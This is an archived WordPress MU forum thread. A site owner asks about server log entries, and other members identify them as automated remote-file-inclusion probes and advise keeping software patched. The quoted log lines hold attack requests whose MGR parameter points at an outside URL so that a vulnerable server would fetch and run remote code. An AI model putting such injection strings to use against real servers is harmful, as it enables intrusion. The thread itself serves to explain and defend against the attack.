The MU forums have moved to WordPress.org

spycorp-lab (10 posts)

  1. kishorebudha
    Member
    Posted 14 years ago #

    Cpanel shows that the folowing acitivities from IPs:

    62.149.12.122

    *

    /ravi/2007/07/24/i-am-sivaji-mgr-and-rajini-too//manager/admin/index.php?MGR=http://www.spycorp-labs.com/echo.
    Http Code: 404 Date: Sep 11 15:30:45 Http Version: HTTP/1.1 Size in Bytes: 14616
    Referer: -
    Agent: libwww-perl/5.79

    Host: 211.171.255.102

    *

    /ravi/2007/07/24/i-am-sivaji-mgr-and-rajini-too//manager/admin/p_ins.php?MGR=http://www.spycorp-labs.com/echo.
    Http Code: 404 Date: Sep 11 15:40:41 Http Version: HTTP/1.1 Size in Bytes: 14610
    Referer: -
    Agent: libwww-perl/5.65

    Any idea what this could be?

  2. drmiketemp
    Member
    Posted 14 years ago #

    Describing what those file paths are would be helpful since they're not wpmu files else all we can do is make guesses. Are they just showing up in your logs? Any references to actual files within your site?

    Both IP addresses are known for being harvesters though. A google search will show you that. :)

  3. kishorebudha
    Member
    Posted 14 years ago #

  4. SteveAtty
    Member
    Posted 14 years ago #

    Its a compromised machine probing your server looking for known exploits in php files.

    Its attempting to call manager/admin/p_ins.php with a parameter which is a URL that contains code which will then be executed on the server.

    The file is not part of WPMU.

    You'll find a lot of similar probes if you look in your server logs - I get 20/30 a day.. or more. In fact I've just had 53 from 60.230.184.151

  5. drmiketemp
    Member
    Posted 14 years ago #

    I understand that. Again, though, those are not wpmu files. Does that URL match up with real files within your install or is that url just showing up in your log without regard to what files are within your site? If the files are there, what are they there for?

  6. kishorebudha
    Member
    Posted 14 years ago #

    Nope, there are no such files in my install.

  7. SteveAtty
    Member
    Posted 14 years ago #

    which is what the 404 is telling you.

    Nothing you can do about it - the machines don't care that you've not got the software installed , they will simply run through their scripts of exploits until they've finished

  8. drmiketemp
    Member
    Posted 14 years ago #

    Someone trolling for broken scripts:

    http://www.milw0rm.com/exploits/4387

    edit: Check out the date at the bottom of that page. This is one of the reasons why I suggest patching out of trac. That appeared just today and folks are already looking for it.

    reedit: And that html in the blog title is another reason but Donncha did a version release at the same time.

  9. kishorebudha
    Member
    Posted 14 years ago #

    drmiketemp? Do I need to do something about it?

  10. SteveAtty
    Member
    Posted 14 years ago #

    You can't stop people trolling for exploits. All you can do is ensure that anything you've got running is kept upto date - especially when it comes to security patches

About this Topic

  • Started 14 years ago by kishorebudha
  • Latest reply from SteveAtty